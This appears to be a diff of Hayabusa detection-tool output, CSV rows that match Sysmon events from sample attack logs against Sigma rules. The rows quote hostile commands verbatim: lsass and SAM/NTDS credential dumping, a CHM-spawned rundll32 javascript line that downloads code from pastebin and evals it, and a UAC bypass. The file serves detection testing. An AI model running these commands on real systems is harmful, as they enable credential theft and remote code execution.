+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,../hayabusa-rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
